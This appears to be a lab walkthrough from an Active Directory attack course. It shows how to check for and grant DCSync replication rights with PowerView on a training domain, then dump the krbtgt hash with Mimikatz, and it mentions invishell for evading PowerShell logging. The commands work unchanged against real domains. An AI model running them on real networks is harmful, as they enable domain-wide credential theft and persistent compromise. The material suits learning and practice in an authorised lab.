Obj 12 DCSync
Task - Check if student has Replication (DCSync) rights. If yes, execute the DCSync attack to pull hashes of the krbtgt user. If no, add the replication rights for the student and execute the DCSync
If the student has replication rights we can execute the DCSync attack to pull hashes of the krbtgt use
If the current user does NOT have replication rights we can add the replication rights for the student and execute the DCSync attack to pull hashes of the krbtgt user
Check to see if the user has replication rights
We are going to start from an elevated shell, run invishell and load powerview.ps1
Now we can run the following command to see if the user has replication rights
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx"}- IF USER DOES NOT HAVE REPLICATION RIGHTS -
We can add the replication rights to the user. We need to start a new process on the user machine, run invishell and load powerview.ps1
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity studentx-Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -VerboseWe can now go back to our other shell and check to see if we have replication rights now.
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx"}Once we have replication rights for our user we can use the DCSync attack to dump the creds of krbtgt user
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'Last updated